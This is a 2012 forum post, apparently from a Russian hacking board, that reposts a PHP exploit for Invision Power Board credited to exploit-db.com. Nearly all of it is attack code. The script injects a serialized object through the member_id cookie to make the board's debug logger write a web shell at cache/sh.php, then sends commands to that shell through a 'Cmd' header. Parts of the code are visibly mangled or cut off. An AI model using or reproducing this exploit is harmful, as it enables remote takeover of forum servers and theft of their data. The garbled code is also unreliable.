27.11.2012, 18:03
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
[B]Invision Power Board \n";
print"\nExample....: php$argv[0]localhost /";
print"\nExample....: php$argv[0]localhost /ipb/\n";
die();
}
list($host,$path) = array($argv[1],$argv[2]);
$packet="GET{$path}index.php HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Connection: close\r\n\r\n";
$_prefix=preg_match('/Cookie: (.+)session/',http_send($host,$packet),$m) ?$m[1] :'';
classdb_driver_mysql
{
public$obj= array('use_debug_log'=>1,'debug_log'=>'cache/sh.php');
}
# Super bypass by @i0n1c
$payload=urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2 :{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"c ache/sh.php";}}}');
$phpcode='';
$packet="GET{$path}index.php?{$phpcode}HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Cookie:{$_prefix}member_id={$payload}\r\n";
$packet.="Connection: close\r\n\r\n";
http_send($host,$packet);
$packet="GET{$path}cache/sh.php HTTP/1.0\r\n";
$packet.="Host:{$host}\r\n";
$packet.="Cmd: %s\r\n";
$packet.="Connection: close\r\n\r\n";
if (preg_match('/
[/COLOR]
[/PHP]
(c) exploit-db.com
|
|
|